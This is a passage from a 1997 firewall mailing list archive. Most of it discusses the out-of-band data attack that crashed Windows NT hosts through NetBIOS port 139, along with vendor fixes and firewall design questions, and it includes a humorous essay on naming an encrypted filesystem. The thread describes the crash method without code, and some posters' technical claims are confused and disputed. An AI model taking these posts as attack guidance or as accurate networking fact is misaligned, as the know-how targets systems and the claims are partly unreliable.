Jun 1997 08:59:22 -0700 (PDT) Received: from cons-evyncke.cisco.com (bru-dhcp30.cisco.com [171.68.129.144]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id RAA12463; Thu, 5 Jun 1997 17:59:16 +0200 (METDST) Message-Id: <3.0.32.19970605180152.006d0788@brussels.cisco.com> X-Sender: evyncke@brussels.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Thu, 05 Jun 1997 18:01:53 +0000 To: Daniel Strawson , Jyri Kaljundi From: Eric Vyncke Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts Cc: Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Daniel, Out-of-band data, also called urgent data, is an armless option which is used in some cases (I think FTP abort and some Telnet). It is not a dangerous option like source routing, ... which by the way are not put in the fixed IP header but in the variable part of the IP header. Bottom: out-of-band data is armless and firewalls should allow this data to go through (and not break when finding one...). Eric At 14:24 5/06/97 +0100, Daniel Strawson wrote: > >Hang on a moment. > >Let me put this in perspective. > >As I understand it, this problem results from sending packets with a >particular IP option set in the header. (Please confirm I'm right here >someone). > >Firewall _SHOULD_ drop all packets with IP options set. This would mean >that all Firewall-1 systems and systems behind Firewall-1 are impervious >to this attack. (something for Checkpoint to be proud of). > >Unfortunately this is not the case - as I say I've managed to get NT to >crash with FW-1 installed. > >Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to >crash, you get the NT system that it is running on to crash, so it is not >an insecurity, but a claimed feature that doesn't work. > >So, either - > > - The IP Options drop code in FW-1 doesn't work. > > or > > - I do not properly understand this attack and it does not work as I > imagine - in this case, please correct me. > >Cheers, > >Daniel > > > >On Thu, 5 Jun 1997, Jyri Kaljundi wrote: > >> On Wed, 4 Jun 1997, Daniel Strawson wrote: >>=20 >> > We tried it and, yes we managed to crash an NT based Firewall-1 system. >> > This is odd since (if memory serves) the packets should be dropped on= the >> > floor by the stateful inspection module. >>=20 >> You mean you can crash and NT FW-1 by sending OOB data to it?! >> That's scary if it is true and should be addressed by Check Point ASAP! >>=20 >> What I have always thought of FW-1 is that it operates at quite low level >> inside the OS kernel, that as long as you filter everything the network >> bugs in the OS don't really matter, as the packets never reach FW-1.=20 >>=20 >> If sending some bytes of data to FW1 crashes it and the OS, this >> combination (FW1+NT) should not be used as a firewall solution at all.= May >> be someone from CP could explain, how much do the bugs in the OS matter >> once FW1 is installed. >>=20 >> J=FCri >>=20 >>=20 > Eric Vyncke =20 Technical Consultant Cisco Systems Belgium SA/NV Phone: +32-2-778.4677 Fax: +32-2-778.4300 E-mail: evyncke@cisco.com Mobile: +32-75-312.458 From owner-firewalls-outgoing Fri Jun 6 01:37:53 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA04321 for firewalls-outgoing; Thu, 5 Jun 1997 20:12:01 -0700 (PDT) Received: from www.valuu.net (www.valuu.net [204.252.40.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA04222 for ; Thu, 5 Jun 1997 20:11:39 -0700 (PDT) Received: from fd.valuu.net ([204.252.40.3]) by www.valuu.net (post.office MTA v1.9.1 ID# 0-11837) with SMTP id AAA430 for ; Thu, 5 Jun 1997 23:17:36 -0400 Received: by fd.valuu.net with Microsoft Mail id <01BC7206.0E15A100@fd.valuu.net>; Thu, 5 Jun 1997 23:13:19 -0400 Message-ID: <01BC7206.0E15A100@fd.valuu.net> From: rabbi@www.valuu.net (Rabbi Haim Cassorla) To: "'firewalls@GreatCircle.COM'" Subject: FW: [FW1] Out of Band Data Attack against NT-Hosts Date: Thu, 5 Jun 1997 23:13:17 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Microsoft has a fix for OOB which can only be applied after SP3 for NT4 = Both SP3 and the OOB Fix are available at their FTP site. Shalom Rabbi ---------- From: Pete Vickers[SMTP:pvickers@adtranz-signal.co.uk] Sent: Thursday, June 05, 1997 2:05 PM To: Jyri Kaljundi; 'Bryan D. Boyle' Cc: firewalls@GreatCircle.COM Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts i was under the impression that since FW-1 only supported serveral net = i/f cards that they rewrote the drivers for these, and thus managing to = get between the OS and the card h/w. [pls correct me if i'm wrong, this was only an assumption !] Pete ---------- From: Bryan D. Boyle Sent: 05 June 1997 13:46 To: Jyri Kaljundi Cc: firewalls@GreatCircle.COM Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts At 03:08 PM 6/5/97 +0300, you wrote: >You mean you can crash and NT FW-1 by sending OOB data to it?! >That's scary if it is true and should be addressed by Check Point ASAP! > It is a bogosity with NT and not with FW1. Can't be addressed by = Checkpoint,=20 since the OS is not in their control. They can only operate (or be as secure as) at the least common denominator level of the underlying OS. >What I have always thought of FW-1 is that it operates at quite low = level >inside the OS kernel, that as long as you filter everything the network >bugs in the OS don't really matter, as the packets never reach FW-1.=20 Nothing except MS code operates in the NT kernel. This problem is with=20 what happens when you send oob data to a stack (MS) that is tightly = integrated with the OS (FW1 runs on top of this stuff, not in it...) and the = stack/OS interface and control mechanism itself is crap. Of course, on UN*X systems, this is not the case. This is a signal = example of the difference between designing for peer review of your security = model and designing for what gets good trade publication reviews. =20 > >If sending some bytes of data to FW1 crashes it and the OS, this >combination (FW1+NT) should not be used as a firewall solution at all. = May >be someone from CP could explain, how much do the bugs in the OS matter >once FW1 is installed. If there is an overall architectural problem with NT as it is, then the = OS bugs matter A LOT. But, of course, those that say you can trust a black = box solution since the vendors are trustworthy are quite quiet on this = regard... I would agree that you should ignore NT as an OS platform in a=20 security solution right now. Just my opinion, $.02 US, etc. Flames to /dev/null. -- Bryan D. Boyle | LOGICAL: bdboyle@att.com 201-386-8584 #include | VIRTUAL: http://www.access.digex.net/~bdboyle AT&T Laboratories, Inc. | PHYSICAL: Whippany, NJ | HISTORICAL: HQ, 6th Battalion, Army of No. VA. "What country can preserve its liberties, if its rulers are not warned from time to time, that its people preserve the spirit of resistance?" -Thomas Jefferson, 1787 From owner-firewalls-outgoing Fri Jun 6 01:50:06 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA07203 for firewalls-outgoing; Thu, 5 Jun 1997 12:11:36 -0700 (PDT) Received: from gate3.fmr.com (gate3.fmr.com [192.223.170.13]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA07181 for ; Thu, 5 Jun 1997 12:11:26 -0700 (PDT) Received: (from adm@localhost) by gate3.fmr.com (8.7.3/8.6.9) id PAA08120 for ; Thu, 5 Jun 1997 15:15:24 -0400 (EDT) Received: from msgbos100nts.fmr.com(137.199.100.25) by gw01i via smap (g3.0.3) id xma008046; Thu, 5 Jun 97 15:15:07 -0400 Received: by msgbos100nts.fmr.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52) id <01BC71C3.40025F70@msgbos100nts.fmr.com>; Thu, 5 Jun 1997 15:15:06 -0400 Message-ID: From: "Feeney, Tim" To: "firewalls@GreatCircle.COM" Subject: RE: ISP Connection Date: Thu, 5 Jun 1997 15:09:00 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: BLeBlanc@igate.sprint.com > >Having a third party perform the administrative functions must be >determined by weighing many factors. You need to decide: > >"Which security technology is best for my environment? (based on your >security policy - what type(s) of security need to be deployed? >Firewall? Strong Authentication? Encryption? and what/who are you trying >to secure?) > >"Who are the respected and reliable vendors in the market?" (this must >include the third party that you are considering doing the management, >as well as, the vendor/manufacturer of the security products >themselves). A bit beyond the respect and reliability factor is the security factor for the vendor. You need to check to see that their systems are secured properly so that a successful attack on the vendor does not compromise your company. In addition if your company does exhaustive background checks on employees then the vendor's background checks for their employees should be at the same level or higher. Remember that the vendor now has access to your internal network and can "spy" on you without you even knowing. In addition make sure that your machine is fairly isolated from the vendors other customers machines as these customers could have access to your network if the setup of the vendors network allows it. >Obviously, monetary cost factors come in to play. Whether you buy the >hardware/os/software and manage the components in-house -vs- you >out-source these to a third party and pay month-to-month. > >Do you have the staff to manage the firewall in-house? (A firewall is >NOT a collateral duty to be assigned to a data center's staff that has >no background in firewalls). What level of expertise does the >third-party have? (Your third-party vendor should have a significantly >sized team of security engineers that have substantial background and >knowledge in the security areas you need/choose). I would also suggest that you bring someone up to speed on security mechanisms and issues. It would behove you to have someone that could check that the vendor is doing things in the proper manner. This person need not have expertise in installing and setting up secure environments but should be able to atleast know the ramifications of, and defense against, various attacks and setups. >What standard services does the third party perform? You (the customer) >must have the ability to sit with the third party and "design a >unique-to-you" security service. YOU must be able to determine the >rules. You must have the power to change those rules at any time >(24*7*365). > >What value-added services does the third party perform? Do they perform >monitoring for suspicious activity? Do they perform backups on all of >the critical files and maintain them off-site (this should be part of >your disaster recovery plan for all systems)? Do they provide you with >a detailed report of what happened on the firewall? > >Once you have weighed these issues (these being a sample of the total >questions you need to ask yourself and the third-party provider), you >should be able to make a determination on whether to handle the task >in-house or out-source. On a bit of a side note: I have dealt with BBN and come to feel that they are a very professional and knowledgeable group. However be prepared to go through a few steps to make changes or updates to your system. They require certain procedures to be followed before any change is implemented. This is a good thing but it does tend to slow the change process up a bit. Tim From owner-firewalls-outgoing Fri Jun 6 01:59:29 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA15938 for firewalls-outgoing; Thu, 5 Jun 1997 12:58:49 -0700 (PDT) Received: (mcb@localhost) by honor.greatcircle.com (8.8.5/Honor-970427-1) id MAA15901 for firewalls@greatcircle.com; Thu, 5 Jun 1997 12:58:33 -0700 (PDT) Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA09438 for ; Tue, 3 Jun 1997 09:00:35 -0700 (PDT) From: proff@suburbia.net Received: from suburbia.net (suburbia.net [198.142.2.24]) by pdx1.world.net (8.7.5/8.7.3) with SMTP id JAA21777 for ; Tue, 3 Jun 1997 09:07:08 -0700 (PDT) Received: (qmail 26297 invoked by uid 110); 3 Jun 1997 16:03:44 -0000 Message-ID: <19970603160344.26296.qmail@suburbia.net> Subject: Cryptographic Mythology To: firewalls@greatcircle.com Date: Wed, 4 Jun 1997 02:03:43 +1000 (EST) X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here is something to amuse, delight and horrify - the tail of: _One Man's Search for a Cryptographic Mythology_. I recently wrote a VNODE (4.4bsd) based encrypted file-system. Now the day dawned when I decided it was high time to discard my rather egocentric working name _Proffs_ (i.e Proff File System) and cast about for a decent, respectable name. My first thought on this matter was: CERBERUS, n. The watch-dog of Hades, whose duty it was to guard the entrance -- against whom or what does not clearly appear; everybody, sooner or later, had to go there, and nobody wanted to carry off the entrance. Cerberus is known to have had three heads, and some of the poets have credited him with as many as a hundred. Only, what was the relation between KERBEROS and CERBERUS? Pups from the same litter, or was the relationship a little more incestuous? I had to find out. There was no way - n o w a y - I'd be having my encrypted file system playing second fiddle to that evil authentication beast. KERBEROS; also spelled Cerberus. n. The watch dog of Hades, whose duty it was to guard the entrance--against whom or what does not clearly appear; . . . it is known to have had three heads. . . Mythology couldn't get any more incestuous than that. 450,000 bytes of Greek polytheism later, and I'm wondering if the Gods of Olympus really had any high-paid guards to speak of except the multi-headed mongrel from Hades. I'm feeling down. I'm cursing the Ancients. I'm disrespectfully humming tunes `All and All it's Just Another Greek in the Wall', and `Athena be my Lover' when I discover: JANUS: in Roman mythology, custodian of the universe, god of beginnings. The guardian of gates and doors, he held sacred the first hour of the day, first day of the month, and first month of the year (which bears his name). He is represented with two bearded faces set back to back. Custodian of the universe. Guardian of gates and doors. Cooool. Janus. January. I like it. Only while I'm liking it, I'm thinking that I've heard the word Janus a lot before. I'm thinking it isn't just me who has looked up from the middle of a Greek mythology text, whilst in the throes of a name hunt with the words "Cooool" on their tongue. No: the Gods just don't smile on me that way. AltaVista confirms the truth of Heaven's bad attitude towards me. 17,423 references. _The Janus Mutual Trade Fund_, _The Janus Project_, _Janus ADA95_, a dozen ISPs from Canada (what is it WITH these Canadians?), _Janus' cool word list_ (turns out to be not so cool), _The Janus Ensemble_, _Hotel Janus_, _Janus Theatre_, _janus.com_, _janusfunds.com_, _Janus_ an Australian Police drama series and of course, the sixth moon of Saturn - _Janus_. Janus is out-of-the-picture. I'm not sure whether to feel smug or grim about the rest of the world's lack of originality. Guards. Guardians. The Greeks didn't have many with bite and I'm loosing patience with the whole culture. Euphrosyne, Aglaia, and Thalia do not grace me. What I need is something that evokes passion within my cryptographic domain. And when you come down to it, that means something which produces copious amounts of gore and blood, at will, from those who would dare to pass its demesne of protection. The Erinyes, or Furies, were three goddesses who punished by their secret stings the crimes of those who escaped or defied public justice. The heads of the Furies were wreathed with serpents, and their whole appearance was terrific and appalling. Their names were Alecto, Tisiphone, and Megaera. They were also called Eumenides. Aye. Plenty of gore there. But somewhat lacking in cryptographic analogy. Fantastic material for the group that doesn't meet at number 41 every Saturday night though. They will appreciate what the Erinyes were trying to achieve. Somewhat heartened, my mind turns to the Erinyes' dress sense. "..heads of the Furies were wreathed with serpents, and their whole appearance was terrific and appalling". Terrific. Serpents. Terrific \Ter*rif"ic\, a. [L. terrificus; fr. terrere: to frighten + facere: to make. See Terror, and Fact.] Causing terror; adapted to excite great fear or dread; terrible; as, a terrific form; a terrific sight. Is it a symptom of society in decay that this word has come to mean: Excellent \Ex"cel*lent\, a. [F. excellent, L. excellens, -entis, p. pr. of excellere. See Excel.] 1. Excelling; surpassing others in some good quality or the sum of qualities; of great worth; eminent, in a good sense; superior, as an excellent man, artist, citizen, husband, discourse, book, song, etc.; excellent breeding, principles, aims, action. Or as Milton would say: To love . . . What I see excellent in good or fair. On the other hand, David Hume (1711-1776): The more exquisite any good is, of which a small specimen is afforded us, the sharper is the evil, allied to it; and few exceptions are found to this uniform law of nature. The most sprightly wit borders on madness; the highest effusions of joy produce the deepest melancholy; the most ravishing pleasures are attended with the most cruel lassitude and disgust; the most flattering hopes make way for the severest disappointments. And, in general, no course of life has such safety (for happiness is not to be dreamed of) as the temperate and moderate, which maintains, as far as possible, a mediocrity, and a kind of insensibility, in every thing. Perhaps it is the sign of a brain in decay, rather than a society that I dwell on it so, because Terrific hair serpents of course lead unfailing into the arms of the Medusa. A guardian of fearsome looks, but dubious motivations according to authorities like Clash of the Titans (1981). A moot point, perhaps as Princeton's history department no longer wants to talk to me. I'm cast adrift, to rely on my Plasticine childhood memories and the mythological swamp of the web. NAME: Medusa FAVORITE PASTIME: Turning men to stone PLACE OF ORIGIN: Los Alamos Secret CIA Lab SPECIAL GIFTS: Petrified Aggregate Projectist FAVORITE MOVIE: Mighty Morphin' Power Rangers GOALS IN LIFE: To be a nice person FAVORITE BOOK: Madonna's biography PET PEEVE: Bad hair days Jesus. I've been sucked into comic book hell. Princeton, take me back. I won't curse at the ancient Greek's sexual proclivities anymore. I'm sure chaste marriages were very daunting to those yet to have them. I was only joking. Lighten up will you? But, alas, the history faculty however was still nursing its wounds, and was not ready to forgive me. I'd have to find an authoritative source somewhere else. Perhaps I could filter out the comic book hell contaminants and come up with respected history Ivy, even if it wasn't Princeton Ivy. To decapitate - to castrate. The terror of the Medusa is thus a terror of castration that is linked to the sight of something. The hair upon the Medusa's head is frequently represented in works of art in the form of snakes, and these once again are derived from the castration complex. It is a remarkable fact that however frightening they may be in themselves, they nevertheless serve as a mitigation of the horror, for they replace the penis, the absence of which is the cause of the horror. This is a confirmation of the technical rule according to which a multiplication of penis symbols signifies castration. Sigmund Freud The Medusa's Head You had to hand it to Sigmund. He was nothing if not authoritative, and after reading his inspiring words on the terrific serpent haired woman, it became clear to me that _Proffs_ and the Gorgon had somewhat unresolved metaphorical incompatibilities. I didn't want my software giving anyone a castration complex. I decided to put aside the denizens of Olympus from contest verbatim. I'd read Fraud on Perversions a few years before and knew Medusa was just a portent of what was to come. What I needed was another polytheist culture entirely. Latin didn't help me. Nearly all the Roman Gods had been vilely plagiarised from the Greeks, Latin names or not. Freud knew this as well as I did. The Norse gods were of little assistance to me. The only one worth paying school to was Loki, the Norse god of mischief. Loki was a very cool fellow, which was why his name has been appropriated as a moniker by virtually every Bjorn, Sven, and Bob hacker to come out of Scandinavia in the last 10 years. No, Loki was not for me. The problem craved for a polytheist mythology outside the realm of my, and more importantly Sigmund Freud's, Western European upbringing. The answer to my question was by definition locked within a body of history I didn't know an onion skin about. In order for the pilgrim to reach the master he must first place his foot on the path, no matter how gradual the slope up the mountain of enlightenment. Zen Buddhism is good like that. Fabricating parables up as you go along that is. Zen master Gutei raised his finger whenever he was asked a question about Zen. A young novice began to imitate him in this way. When Gutei was told about the novice's imitation, he sent for him and asked him if it were true. The novice admitted it was so. Gutei asked him if he understood. In reply the novice held up his index finger. Gutei promptly cut it off. The novice ran from the room, howling in pain. As he reached the threshold, Gutei called, "Boy!". When the novice returned, Gutei raised his index finger. At that instant the novice was enlightened. But wait. This Koan isn't fabricated. At least, not by me. And unlike most Zen Koan's I think you will agree that it pleasantly satisfies Schopenhauer's "life, without pain, has no meaning". However, semantically I'm seeing a very unhealthy correlation to forgetting one's encryption key and losing one's finger. My mind is drawn to the memory of the real-life nightmare of laying in the easy-chair of a Swanston St. hypnotherapist suite, gazing intently into a bright, but distant red light, while chanting the mantra "I am not cynical about hypnotherapy. I am not cynical about hypnotherapy. I am not cynical about an Indian doctor with a 5th floor office decorated coup'd'Edelstien. I'm not cynical about a man who claims that his foremost clientele are rich middle aged women who have put their jewellery somewhere "safe" and consequently are unable to recall the location. I'm not cynical about a hypnotist who extols the virtues of having a M.D. so his patients can claim 2/3rds of the cost of these jewellery retrieval sessions under Medicare. I'm not cynical that these middle aged women are infact suffering from some form of Mesmer complex. And by all the powers in Heaven, I have no pessimism about recalling my god-damned pass-phrase!". I never did remember the pass-phrase and you will notice Gutei keeps very quiet about what he does with the novice's finger. In this particular case, given the value of the data, I would have traded placed with Gutei's novice, before you can say "Boy! Was I enlightened". I put my chin on my knee, and stare at the grain of my beige plastic monitor case. Unless I could jump into another reality it was the end of the line for _Proffs_ and _One Man's Search for a Cryptographic Mythology_. Boy! Was I bummed. One of the great sins of us programmers is procedural thinking. And it was exactly this sort of folly I was engaging in. There were around 6 billion other realities going about their business. I grant you that 2 billion of these were no doubt indulging in the confusion and diffusion of an avalanche of pseudo-random mental images and sequences we associate with dreams, and probably another 2 billion busy expanding their minds with the powerful products of hash or decaying into a compressive state of increasing entropy and beer rounds. This still left a select 2 billion souls with which to weave my work. If I approached them directly rather than by analysing the information trails they left behind, I'd stand a good chance of getting my feet onto the path of cryptographic mythological enlightenment. I have a Swedish friend who calls himself Elk on odd days and Godflesh on even days. Don't ask why. As far as I know he's not bisexual. Elk listened to my quest for cryptographic myth. He had pondered, and uncovered a diamond in the rough. MARUTUKKU. The third name is MARUTUKKU, Master of the arts of protection, chained the Mad God at the Battle. Sealed the Ancient Ones in their Caves, behind the Gates. F a r o u t. Master of the arts of protection. Chained the Mad God. Sealed the Ancient Ones in their Caves, behind the Gates. Even the very word MARUTUKKU looks like it has been run through a product cipher. But I wasn't about to trust the work of a self-admitted Swedish Sumeria freak who was obviously suffering from a bi-polar moniker disorder. Was it mere coincidence that MARUTUKKU was an anagram for KUKU MART and KUKU TRAM? I didn't want MARUTUKKU to end up as another cog in the annals of Freudian analogy. What I needed was the sort of Authoritative History that only Princeton's history faculty could provide. The tablets of the Enuma Elish: The Akkadian Creation Epic Based on the translation of E. A. Speiser, with the additions by A. K. Grayson, Ancient Near-Eastern Texts Relating to the Old Testament, third edition, edited by James Pritchard (Princeton, 1969), pp. 60-72; 501-503, with minor modifications. This work, the ancient Mesopotamian creation epic consisting of seven tablets, tells of the struggle between cosmic order and chaos. It is named after its opening words. It was recited on the fourth day of the ancient Babylonian New Year's festival. The text probably dates from the Old Babylonian period, i.e., the early part of the second millennium B.C.E. [...] The third name is MARUTUKKU Master of the arts of protection, chained the Mad God at the Battle. Sealed the Ancient Ones in their Caves, behind the Gates. [...] MARUTUKKU truly is the refuge of his land, city, and people. Unto him shall the people give praise forever. All praise the MARUTUKKU! My search had born a ripe and tasty fruit indeed. The quest for a cryptographic mythology was complete. Or was it? The words of Hume kept coming back to me and I had a nagging feeling that there was some substance in them. If MARUTUKKU was my exquisite cryptographic good, of wit, effusive joy, ravishing pleasure and flattering hope; then where was the counter point? The figure to its ground - the sharper evil, the madness, the melancholy, the most cruel lassitudes and disgusts and the severest disappointments. Was Hume right? Because if he was, there was only one organisation this string of hellish adjectives could represent. The cryptographic devil with its 500,000 sq feet of office space in Maryland. But surely there could be no reference to such an organisation in the 4,000 year old Babylonian tablets. The idea was preposterous. Wasn't it? TABLET VII OF THE ENUMA ELISH: ESIZKUR shall sit aloft in the house of prayer; May the gods bring their presents before him, that from him they may receive their assignments; none can without him create artful works. Four black-headed ones are among his creatures; aside from him no god knows the answer as to their days. It's a cold and wintry night, here in Melbourne. Despite this, the gusts of wind and rain seem to be unusually chilling. What had I, in my search for a cryptographic mythology, stumbled onto? I look hard at the seven letters E-S-I-Z-K-U-R. A frown turns to a smile and then a dead pan stare. I write down: IRK ZEUS -- Prof. Julian Assange |If you want to build a ship, don't drum up people |together to collect wood and don't assign them tasks proff@iq.org |and work, but rather teach them to long for the endless proff@gnu.ai.mit.edu |immensity of the sea. -- Antoine de Saint Exupery From owner-firewalls-outgoing Fri Jun 6 02:31:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA25631 for firewalls-outgoing; Fri, 6 Jun 1997 00:51:57 -0700 (PDT) Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA25527 for ; Fri, 6 Jun 1997 00:51:21 -0700 (PDT) Received: from cons-evyncke.cisco.com (brussels-ppp3.cisco.com [171.68.146.24]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id JAA26113; Fri, 6 Jun 1997 09:52:17 +0200 (METDST) Message-Id: <3.0.32.19970606095033.0068dae8@brussels.cisco.com> X-Sender: evyncke@brussels.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Fri, 06 Jun 1997 09:54:54 +0000 To: "Jonathan M. Bresler" , Cy Ardoin From: Eric Vyncke Subject: Re: PIX and FW-1 (packet filter Question) Cc: Firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 13:18 5/06/97 -0400, Jonathan M. Bresler wrote: > >>I don't think there is anything an application firewall can >>do that can't also be done by a "packet filter" firewall. The > > trivial example: > a smtp application level proxy can disable the "debug" command >for every sendmail behind that firewall. This kind of stuff is also done in some full-state inspection firewalls :-) > >>new packet filter firewalls are not like the old Cisco/Bay router >>filters. The new systems operate at the network layer, but they >>have knowledge of the protocols and applications. They >>open up the packets and modify the data. These systems are >>doing content filtering and other "application" types of operations. >>Yes, not all of them do these things, but many do, and new >>feature/functions are being added to these systems every year. > >jmb > > >-- >Jonathan M. Bresler 202-452-2831 breslerj@frb.gov >MS-169 Federal Reserve Board of Governors Washington DC 20551 >Speaking for myself. Others speak for the Federal Reserve Board of Governors > > Eric Vyncke Technical Consultant Cisco Systems Belgium SA/NV Phone: +32-2-778.4677 Fax: +32-2-778.4300 E-mail: evyncke@cisco.com Mobile: +32-75-312.458 From owner-firewalls-outgoing Fri Jun 6 03:10:18 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA25267 for firewalls-outgoing; Thu, 5 Jun 1997 08:07:29 -0700 (PDT) Received: from venus.milehigh.net ([207.78.104.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA25227 for ; Thu, 5 Jun 1997 08:07:20 -0700 (PDT) Received: from sysbrien ([207.78.104.27]) by venus.milehigh.net (post.office MTA v1.9.3b ID# 0-17836) with SMTP id AAA41 for ; Thu, 5 Jun 1997 09:13:44 +0100 Message-ID: <3396817F.7BE@milehigh.net> Date: Thu, 05 Jun 1997 09:06:07 +0000 From: syscrash@milehigh.net (Brian Delgado) Reply-To: syscrash@milehigh.net X-Mailer: Mozilla 3.01 (Win95; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: Raptor firewall Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am kind of a beginner at this so I apologize if this question is basic, but I figured this would be the best forum to get a valid answer. Here is my question: I am setting up Raptor on a Windows NT 4.0 server. I am currently running DNS on a SUN platform for internal name resolution. I realize that Raptor is an application gateway. Does this mean I have to run my name server on the Bastion host or can I continue to run it where I am currently? Any help would be appreciated. Brien Delgado From owner-firewalls-outgoing Fri Jun 6 03:16:52 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA29599 for firewalls-outgoing; Thu, 5 Jun 1997 22:31:29 -0700 (PDT) Received: from glacier.wise.edt.ericsson.se (glacier-ext.wise.edt.ericsson.se [193.180.251.38]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id WAA29533 for ; Thu, 5 Jun 1997 22:31:10 -0700 (PDT) Received: from geek (geek.nmac.ericsson.se [130.100.187.83]) by glacier.wise.edt.ericsson.se (8.7.5/8.7.3/glacier-0.9) with ESMTP id HAA15940 for ; Fri, 6 Jun 1997 07:35:08 +0200 (MET DST) Received: from haig.oplab.nmac.ericsson.se (haig.oplab.nmac.ericsson.se [130.100.187.85]) by geek (8.8.5/8.8.5) with ESMTP id FAA04693 for ; Fri, 6 Jun 1997 05:36:54 +0200 Received: by haig.oplab.nmac.ericsson.se with Internet Mail Service (5.0.1457.3) id ; Fri, 6 Jun 1997 07:35:04 +0200 Message-ID: <43BED8177D10D011A69A0800092C15D7011BFD@haig.oplab.nmac.ericsson.se> From: =?iso-8859-1?Q?Robert_St=E5hlbrand?= To: "'Mike Hedlund'" Cc: "'firewalls@greatcircle.com'" Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts Date: Fri, 6 Jun 1997 07:35:01 +0200 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What is the problem here??? Of course (as Mike Hedlund says) is a NT-machine (win95 and win3.11 as well) only vulnerable to the OOB-bug on port 139 (netbios) and I REALLY HOPE that not anyone let this service through their firewall. And even if you are using a NT firewall (nuts but anyway) this should really be no problem. So, what is the problem??? Robert St=E5hlbrand Network-, System-responsible NMAC and OPLAB domains. Ericsson Telecom AB Box 333, Fl=F6jelbergsgatan 1C 43124 M=F6lndal Phone number +46 31 7476162 Fax number +46 31 7473777 Email: robert.stahlbrand@nmac.ericsson.se > -----Original Message----- > From: Mike Hedlund [SMTP:mike@isi.net] > Sent: den 5 juni 1997 20:05 > To: Daniel Strawson > Cc: Jyri Kaljundi; Greg Loffel; fw-1-mailinglist@us.checkpoint.com; > Firewalls mailing list > Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts >=20 >=20 >=20 > If i remember correctly, the OOB attack with NT only effected port > 139, > NetBios. I tried it on all other tcp ports and it had no effect. So > the > only way Firewall-1 would be effected by it would be if it has its = own > bug.. altho i could be mistaken.. if i am somone please correct me. = :) >=20 > -mike >=20 > [Robert St=E5hlbrand] =20 > Absolutely correct!!!=20 > On Thu, 5 Jun 1997, Daniel Strawson wrote: >=20 > >=20 > > Hang on a moment. > >=20 > > Let me put this in perspective. > >=20 > > As I understand it, this problem results from sending packets with = a > > particular IP option set in the header. (Please confirm I'm right > here > > someone). > >=20 > > Firewall _SHOULD_ drop all packets with IP options set. This would > mean > > that all Firewall-1 systems and systems behind Firewall-1 are > impervious > > to this attack. (something for Checkpoint to be proud of). > >=20 > > Unfortunately this is not the case - as I say I've managed to get = NT > to > > crash with FW-1 installed. > >=20 > > Note that it is not as such a FW-1 insecurity - you cannot get FW-1 > to > > crash, you get the NT system that it is running on to crash, so it > is not > > an insecurity, but a claimed feature that doesn't work. > >=20 > > So, either - > >=20 > > - The IP Options drop code in FW-1 doesn't work. > >=20 > > or > >=20 > > - I do not properly understand this attack and it does not work as > I > > imagine - in this case, please correct me. > >=20 > > Cheers, > >=20 > > Daniel > >=20 > >=20 > >=20 > > On Thu, 5 Jun 1997, Jyri Kaljundi wrote: > >=20 > > > On Wed, 4 Jun 1997, Daniel Strawson wrote: > > >=20 > > > > We tried it and, yes we managed to crash an NT based Firewall-1 > system. > > > > This is odd since (if memory serves) the packets should be > dropped on the > > > > floor by the stateful inspection module. > > >=20 > > > You mean you can crash and NT FW-1 by sending OOB data to it?! > > > That's scary if it is true and should be addressed by Check Point > ASAP! > > >=20 > > > What I have always thought of FW-1 is that it operates at quite > low level > > > inside the OS kernel, that as long as you filter everything the > network > > > bugs in the OS don't really matter, as the packets never reach > FW-1.=20 > > >=20 > > > If sending some bytes of data to FW1 crashes it and the OS, this > > > combination (FW1+NT) should not be used as a firewall solution at > all. May > > > be someone from CP could explain, how much do the bugs in the OS > matter > > > once 